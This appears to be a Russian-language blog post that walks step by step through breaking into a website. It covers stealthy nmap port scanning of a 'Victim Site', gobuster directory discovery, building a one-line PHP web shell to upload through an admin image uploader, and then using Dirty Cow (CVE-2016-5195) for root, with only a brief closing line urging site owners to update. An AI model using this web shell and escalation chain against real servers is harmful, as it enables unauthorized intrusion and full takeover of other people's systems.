Сбор информации об открытых портах средствами Linux и поиск уязвимостей на сайте

Тут всё просто — запускаем в терминале команду и ждем… )) Используем таймер, если хотим сделать сканирование незаметным.

$ nmap —top-ports 1000 -T4 -sC http://example.com

Nmap scan report for example.com {redacted}
Host is up (0.077s latency).
rDNS record for {redacted}: {redacted}
Not shown: 972 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
| ssh-hostkey:
| {redacted}
80/tcp open http
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Victim Site
139/tcp open netbios-ssn
443/tcp open https
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_{redacted}
445/tcp open microsoft-ds
5901/tcp open vnc-1
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ VNC Authentication (2)
8080/tcp open http-proxy
|_http-title: 400 Bad Request
8081/tcp open blackice-icecap

Далее, если мы имеем дело с веб-сервером, можно запустить gobuster, чтобы найти какие-нибудь потенциально «интересные» файлы на веб-сервере:

$ gobuster -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
/admin
/login

Если в административной панели сайта используется загрузка изображений, проверяем наличие уязвимости, связанной с неограниченной загрузкой файлов. Для этого загружаем на сайт картинку, предварительно набрав в своем терминале следующую команду:

echo «<?php system(\$_GET[‘cmd’]); ?>» > exploit.php

Зная куда именно был загружен файл, можно запустить шелл, например вот по такому адресу:

http://www.example.com/admin/ftp/objects/XXXXXXXXXXXX.php

Если получен доступ к webshell, то для начала проверяем какой Linux установлен на сервере:

$ cat /etc/issue
CentOS Linux release 7.2.1511 (Core)

Если версия ядра старая, это значит, что возможен запуска инструмента, подтверждающего наличие уязвимости, например, такого как Dirty Cow (CVE-2016-5195) с последующим получением root-доступа.

Вывод. Будьте внимательны, друзья, бережно относитесь к безопасности своего сайта, чаще обновляйте систему с помощью незамысловатых команд типа «sudo apt-get update» для подавляющего большинства Linux-дистрибутивов или «yum update» применительно к CentOS (на базе которой работает огромного количество веб-серверов).

Категории: Linux,Безопасность

Комментирование отключено